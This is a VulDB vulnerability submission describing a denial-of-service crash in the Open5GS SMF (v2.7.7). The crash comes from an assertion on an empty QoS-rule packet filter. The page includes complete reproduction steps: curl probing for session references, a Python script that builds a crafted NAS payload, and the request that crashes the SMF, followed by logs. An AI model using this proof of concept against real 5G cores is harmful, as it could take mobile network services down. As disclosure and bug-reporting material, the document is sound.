Submit #808488: Open5gs SMF v2.7.7 Denial of Serviceinfo

TitelOpen5gs SMF v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF crashes when a `PDU Session Modification Request` delivered through `SmContextUpdateData.n1SmMsg` carries a syntactically valid `requested_qos_rules` IE whose packet filter list contains one packet filter with `content.length = 0`. `ogs_nas_parse_qos_rules()` accepts the rule and leaves `rule->pf[i].content.num_of_component = 0`. Later `gsm_handle_pdu_session_modification_qos_rules()` allocates a packet filter and asserts that reconfiguration produced at least one component: ```c pf = smf_pf_add(qos_flow); ogs_assert(pf); ogs_assert(reconfigure_packet_filter(pf, &qos_rule[i], i) > 0); ``` For an empty packet-filter content, `reconfigure_packet_filter()` returns `0`, so the assertion aborts the SMF process. This issue is distinct from the `invalid bitrate unit` bug above: that one is in QoS flow description bitrate conversion, while this one is an assert on the QoS rule packet-filter business logic. ### Steps to reproduce 1. Start the Docker lab and ensure `smf` and `smf-audit-ue` are running. 2. Resolve the current SMF container IP and an active `smContextRef`: ```bash SMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf) docker restart smf-audit-ue >/dev/null sleep 3 REF=$( for i in $(seq 1 30); do code=$(curl --http2-prior-knowledge -m 5 -sS -o /tmp/probe.body -w '%{http_code}' \ -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$i/modify" \ -H 'Content-Type: application/json' \ --data '{"hoState":"COMPLETED"}') if [ "$code" != 404 ]; then echo "$i" break fi done ) echo "SMF_IP=$SMF_IP REF=$REF" ``` 3. Prepare a multipart `SmContextUpdateData` with only `n1SmMsg`, using the malicious NAS payload below. The payload is a `PDU Session Modification Request` whose `requested_qos_rules` uses `MODIFY_EXISTING_QOS_RULE_AND_ADD_PACKET_FILTERS`, but the only packet filter has `content.length = 0`: ```bash python3 - <<'PY' from pathlib import Path import json boundary = 'REQBOUNDARY' body = {'n1SmMsg': {'contentId': '5gnas-sm'}} n1 = bytes.fromhex('2e0101c97a00080100056120000f01') parts = [] parts.append( (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) + json.dumps(body, separators=(',', ':')).encode() + b'\r\n' ) parts.append( (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n' f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) + n1 + b'\r\n' ) parts.append(f'--{boundary}--\r\n'.encode()) Path('/tmp/smctx_modify_empty_pf.multipart').write_bytes(b''.join(parts)) PY ``` 4. Send the request: ```bash curl --http2-prior-knowledge -m 10 -sS -i \ -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$REF/modify" \ -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \ --data-binary @/tmp/smctx_modify_empty_pf.multipart ``` 5. Check the SMF process state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --tail 120 smf ``` ### Logs ```shell Client side: curl: (56) Recv failure: Connection reset by peer SMF state: exited 139 2026-04-11T07:54:37.832480109Z SMF log: 04/11 07:54:37.740: [gsm] FATAL: gsm_handle_pdu_session_modification_qos_rules: Assertion `reconfigure_packet_filter(pf, &qos_rule[i], i) > 0' failed. (../src/smf/gsm-handler.c:274) ``` ### Expected behaviour SMF should reject QoS rules whose packet filter content is empty and return a normal protocol error for that request. ### Observed Behaviour The crafted `n1SmMsg` aborts the entire SMF process before any HTTP response is completed, resetting the client connection and terminating the SMF container with exit code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4451
Benutzer
 FrankLin (UID 97501)
Einreichung20.04.2026 21:22 (vor 1 Monat)
Moderieren10.05.2026 17:44 (20 days later)
StatusAkzeptiert
VulDB Eintrag362567 [Open5GS bis 2.7.7 SMF ogs_nas_parse_qos_rules Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Do you want to use VulDB in your project?

Use the official API to access entries easily!